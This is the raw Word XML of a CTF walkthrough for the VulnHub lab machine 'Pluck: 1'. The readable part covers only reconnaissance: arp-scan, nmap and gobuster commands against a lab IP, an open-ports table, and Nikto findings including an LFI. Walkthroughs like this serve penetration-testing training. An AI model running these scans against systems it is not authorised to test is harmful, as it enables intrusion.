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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-1098705477"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="06C9B06D" w14:textId="75692F23" w:rsidR="008D6BB5" w:rsidRDefault="008D6BB5">
          <w:pPr>
            <w:pStyle w:val="NoSpacing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02820225" wp14:editId="5098EFED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e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6-03-24T00:00:00Z">
                                      <w:dateFormat w:val="M/d/yyyy"/>
                                      <w:lid w:val="en-U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74D850C0" w14:textId="616E9E13" w:rsidR="008D6BB5" w:rsidRDefault="00BB6B92">
                                      <w:pPr>
                                        <w:pStyle w:val="NoSpacing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3/24/2026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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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02820225" id="Group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e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6-03-24T00:00:00Z">
                                <w:dateFormat w:val="M/d/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74D850C0" w14:textId="616E9E13" w:rsidR="008D6BB5" w:rsidRDefault="00BB6B92">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing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3/24/2026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u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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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reef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6393091" wp14:editId="2B08F083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Text Box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DD33FC4" w14:textId="798649CE" w:rsidR="008D6BB5" w:rsidRDefault="00000000">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:rPr>
                                    <w:color w:val="4472C4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26"/>
                                      <w:szCs w:val="26"/>
                                    </w:rPr>
                                    <w:alias w:val="Auth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8D6BB5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YUVARAJ M</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                              <w:p w14:paraId="3C422243" w14:textId="7F72E7B9" w:rsidR="008D6BB5" w:rsidRDefault="00000000">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing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ny"/>
                                    <w:tag w:val=""/>
                                    <w:id w:val="1558814826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8D6BB5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6393091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8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4DD33FC4" w14:textId="798649CE" w:rsidR="008D6BB5" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:rPr>
                              <w:color w:val="4472C4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26"/>
                                <w:szCs w:val="26"/>
                              </w:rPr>
                              <w:alias w:val="Auth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8D6BB5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YUVARAJ M</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                        <w:p w14:paraId="3C422243" w14:textId="7F72E7B9" w:rsidR="008D6BB5" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing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ny"/>
                              <w:tag w:val=""/>
                              <w:id w:val="1558814826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8D6BB5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0FF9028" wp14:editId="374A1BB5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Text Box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87A056F" w14:textId="38C526DF" w:rsidR="008D6BB5" w:rsidRDefault="00000000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8D6BB5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Challenge-</w:t>
                                    </w:r>
                                    <w:r w:rsidR="00BB6B92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10</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                              <w:p w14:paraId="5C2F60A5" w14:textId="315A5F85" w:rsidR="008D6BB5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8D6BB5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Solving CTF </w:t>
                                    </w:r>
                                    <w:r w:rsidR="00C57F5F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Machines</w:t>
                                    </w:r>
                                    <w:r w:rsidR="008D6BB5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 </w:t>
                                    </w:r>
                                    <w:r w:rsidR="00C57F5F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from</w:t>
                                    </w:r>
                                    <w:r w:rsidR="008D6BB5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 </w:t>
                                    </w:r>
                                    <w:r w:rsidR="00C57F5F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VulnHub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0FF9028" id="Text Box 30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X4oYw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" filled="f" stroked="f" strokeweight=".5pt">
                    <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                      <w:txbxContent>
                        <w:p w14:paraId="587A056F" w14:textId="38C526DF" w:rsidR="008D6BB5" w:rsidRDefault="00000000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8D6BB5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Challenge-</w:t>
                              </w:r>
                              <w:r w:rsidR="00BB6B92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10</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                        <w:p w14:paraId="5C2F60A5" w14:textId="315A5F85" w:rsidR="008D6BB5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8D6BB5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Solving CTF </w:t>
                              </w:r>
                              <w:r w:rsidR="00C57F5F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Machines</w:t>
                              </w:r>
                              <w:r w:rsidR="008D6BB5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</w:t>
                              </w:r>
                              <w:r w:rsidR="00C57F5F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from</w:t>
                              </w:r>
                              <w:r w:rsidR="008D6BB5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</w:t>
                              </w:r>
                              <w:r w:rsidR="00C57F5F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VulnHub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0C273BDB" w14:textId="5129961A" w:rsidR="00C57F5F" w:rsidRPr="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/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1565334B" wp14:editId="04032530">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="column">
                      <wp:posOffset>2148840</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>2000885</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="3596640" cy="4998720"/>
                    <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                    <wp:wrapNone/>
                    <wp:docPr id="24009378" name="Text Box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596640" cy="499872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97F6196" w14:textId="398F8F00" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00BB6B92" w:rsidP="00785791">
                                <w:pPr>
                                  <w:rPr>
                                    <w:b/>
                                    <w:bCs/>
                                    <w:sz w:val="40"/>
                                    <w:szCs w:val="40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sz w:val="40"/>
                                    <w:szCs w:val="40"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve">Pluck: </w:t>
                                </w:r>
                                <w:r w:rsidR="00B0391F">
                                  <w:rPr>
                                    <w:b/>
                                    <w:bCs/>
                                    <w:sz w:val="40"/>
                                    <w:szCs w:val="40"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve">1 </w:t>
                                </w:r>
                                <w:r w:rsidR="00B0391F" w:rsidRPr="00785791">
                                  <w:rPr>
                                    <w:b/>
                                    <w:bCs/>
                                    <w:sz w:val="40"/>
                                    <w:szCs w:val="40"/>
                                  </w:rPr>
                                  <w:t>Walkthrough</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="1E584595" w14:textId="77777777" w:rsidR="00C57F5F" w:rsidRPr="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F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 w:rsidRPr="00C57F5F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Platform:</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00C57F5F">
                                  <w:rPr>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve"> VulnHub</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="68829560" w14:textId="709CA6DE" w:rsidR="00130FA5" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F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 w:rsidRPr="00C57F5F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Category:</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00C57F5F">
                                  <w:rPr>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve"> Boot2Root </w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="27CCCE71" w14:textId="221B1AEF" w:rsidR="00C57F5F" w:rsidRPr="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F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 w:rsidRPr="00C57F5F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Difficulty:</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00C57F5F">
                                  <w:rPr>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve"> </w:t>
                                </w:r>
                                <w:r w:rsidR="00BB6B92">
                                  <w:rPr>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t>Medium</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="77188C4E" w14:textId="77777777" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F"/>
                              <w:p w14:paraId="0CD3B38F" w14:textId="72CFE6C0" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F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1565334B" id="_x0000_s1057" type="#_x0000_t202" style="position:absolute;margin-left:169.2pt;margin-top:157.55pt;width:283.2pt;height:393.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" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                    <v:textbox>
                      <w:txbxContent>
                        <w:p w14:paraId="197F6196" w14:textId="398F8F00" w:rsidR="00785791" w:rsidRPr="00785791" w:rsidRDefault="00BB6B92" w:rsidP="00785791">
                          <w:pPr>
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="40"/>
                              <w:szCs w:val="40"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="40"/>
                              <w:szCs w:val="40"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Pluck: </w:t>
                          </w:r>
                          <w:r w:rsidR="00B0391F">
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="40"/>
                              <w:szCs w:val="40"/>
                            </w:rPr>
                            <w:t xml:space="preserve">1 </w:t>
                          </w:r>
                          <w:r w:rsidR="00B0391F" w:rsidRPr="00785791">
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="40"/>
                              <w:szCs w:val="40"/>
                            </w:rPr>
                            <w:t>Walkthrough</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="1E584595" w14:textId="77777777" w:rsidR="00C57F5F" w:rsidRPr="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F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C57F5F">
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t>Platform:</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00C57F5F">
                            <w:rPr>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> VulnHub</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="68829560" w14:textId="709CA6DE" w:rsidR="00130FA5" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F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C57F5F">
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t>Category:</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00C57F5F">
                            <w:rPr>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> Boot2Root </w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="27CCCE71" w14:textId="221B1AEF" w:rsidR="00C57F5F" w:rsidRPr="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F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C57F5F">
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t>Difficulty:</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00C57F5F">
                            <w:rPr>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> </w:t>
                          </w:r>
                          <w:r w:rsidR="00BB6B92">
                            <w:rPr>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t>Medium</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="77188C4E" w14:textId="77777777" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F"/>
                        <w:p w14:paraId="0CD3B38F" w14:textId="72CFE6C0" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F"/>
                      </w:txbxContent>
                    </v:textbox>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r w:rsidR="008D6BB5">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5DC66B91" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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50"/>
          <w:szCs w:val="50"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pluck: 1 Walkthrough</w:t>
      </w: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Platform: VulnHub</w:t>
      </w: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Category: Boot2Root</w:t>
      </w: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Difficulty: Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102B8A2F" w14:textId="4C5AFC14" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00B0391F" w:rsidP="00BB6B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IN" w:bidi="kn-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="598576A3" wp14:editId="6ACFD491">
            <wp:extent cx="5731510" cy="2997200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="780419814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419814" name="Picture 78041981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A3EF8" w14:textId="77777777" w:rsidR="00847F1E" w:rsidRDefault="00847F1E" w:rsidP="00BB6B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</w:p>
    <w:p w14:paraId="42B4F03C" w14:textId="77777777" w:rsidR="00847F1E" w:rsidRDefault="00847F1E" w:rsidP="00BB6B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</w:p>
    <w:p w14:paraId="7160D77B" w14:textId="3C3E7255" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:t>Challenge Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B37828B" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Pluck: 1 is a vulnerable Linux machine designed to test web exploitation, enumeration, and privilege escalation skills.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343EF566" w14:textId="77777777" w:rsidR="00847F1E" w:rsidRDefault="00BB6B92" w:rsidP="00B039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The goal is to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0724FB0F" w14:textId="327100F8" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00B039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Discover the target machine</w:t>
      </w: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Perform enumeration</w:t>
      </w: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Exploit vulnerabilities</w:t>
      </w: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Gain user access</w:t>
      </w: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Escalate privileges to root</w:t>
      </w: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Capture the final flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF4DE8C" w14:textId="77777777" w:rsidR="00847F1E" w:rsidRDefault="00847F1E" w:rsidP="00BB6B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</w:p>
    <w:p w14:paraId="4F8C8765" w14:textId="77777777" w:rsidR="00847F1E" w:rsidRDefault="00847F1E" w:rsidP="00BB6B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</w:p>
    <w:p w14:paraId="30C01411" w14:textId="11C8630C" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:lastRenderedPageBreak/>
        <w:t>Target Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE8AB2" w14:textId="4566E372" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Network Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ABA32F" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A017B8" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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BB6B9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 xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B9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arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB6B9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-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBAB8EC" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Target IP identified:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51572213" w14:textId="5B4ACC3A" w:rsidR="00BB6B92" w:rsidRPr="00847F1E" w:rsidRDefault="00BB6B92" w:rsidP="00B039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BB6B9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172.20.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7405FA97" w14:textId="77777777" w:rsidR="00847F1E" w:rsidRDefault="00847F1E" w:rsidP="00B039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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427B0A8A" w14:textId="5D3304D5" w:rsidR="00847F1E" w:rsidRPr="00847F1E" w:rsidRDefault="00B0391F" w:rsidP="00847F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79A116EC" wp14:editId="11EB888B">
            <wp:extent cx="5731510" cy="2980690"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="924079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0795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318E2" w14:textId="05502302" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:t>Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559E51BE" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B2D658" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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BB6B9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nmap -sC -sV -A 172.20.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5AC29" w14:textId="246B59F5" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Open Ports:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="336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8"/>
        <w:gridCol w:w="997"/>
        <w:gridCol w:w="1712"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w14:paraId="35CA4889" w14:textId="77777777" w:rsidTr="00847F1E">
        <w:trPr>
          <w:trHeight w:val="36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3A7198" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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</w:pPr>
            <w:r w:rsidRPr="00BB6B9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  <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65249FBF" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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</w:pPr>
            <w:r w:rsidRPr="00BB6B9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49113FD2" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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</w:pPr>
            <w:r w:rsidRPr="00BB6B9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  <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w14:paraId="6723DA35" w14:textId="77777777" w:rsidTr="00847F1E">
        <w:trPr>
          <w:trHeight w:val="377"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C4D832B" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B9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BB6B92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34ADC277" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B9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BB6B92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SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="090A31C4" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B9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BB6B92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OpenSSH 7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w14:paraId="7C7F83D0" w14:textId="77777777" w:rsidTr="00847F1E">
        <w:trPr>
          <w:trHeight w:val="364"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65771152" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B9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BB6B92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80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23E0707A" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B9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BB6B92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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7447AB32" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B9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BB6B92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Apache 2.4.18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w14:paraId="6834C3E8" w14:textId="77777777" w:rsidTr="00847F1E">
        <w:trPr>
          <w:trHeight w:val="364"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42F0BD12" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B9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BB6B92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3306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="289234C8" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B9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BB6B92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MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BFF9CF3" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B9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BB6B92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Unauthorized</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61A56840" w14:textId="19A56CAF" w:rsidR="00B0391F" w:rsidRPr="00BB6B92" w:rsidRDefault="00B0391F" w:rsidP="00BB6B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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A47455F" wp14:editId="30CF9DBD">
            <wp:extent cx="5731510" cy="3549650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="608413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4133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6848D" w14:textId="733985A3" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:t>Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C380D7C" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6A160E" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6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BB6B9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gobuster dir -u http://172.20.10.2 -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B9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usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB6B9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/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B9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dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB6B9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/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DCDFEA" w14:textId="0444D744" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09870321" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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 xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B9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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B9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admin.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB6B92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br/>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B9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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B9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index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB6B92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br/>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B9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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B9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css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB6B92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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B9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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6B9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js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB6B92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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6B9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/images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7662FA33" w14:textId="62C84C5A" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00B0391F" w:rsidP="00BB6B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3926147A" wp14:editId="5EBBEF15">
            <wp:extent cx="5226050" cy="2628900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2128889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8895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605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5626C" w14:textId="00C8AE3D" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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  <w:lastRenderedPageBreak/>
        <w:t>Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3DB8A8" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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Nikto scan revealed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E1BC54" w14:textId="77777777" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="00BB6B92" w:rsidP="00BB6B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• Apache outdated version</w:t>
      </w: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Directory indexing enabled</w:t>
      </w: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Sensitive file exposure possible</w:t>
      </w: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LFI vulnerability detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384B7D5E" w14:textId="0B1EC073" w:rsidR="00BB6B92" w:rsidRPr="00BB6B92" w:rsidRDefault="000C75F8" w:rsidP="00BB6B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35C9AA9C" wp14:editId="076DF1B4">
            <wp:extent cx="5731510" cy="1584960"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
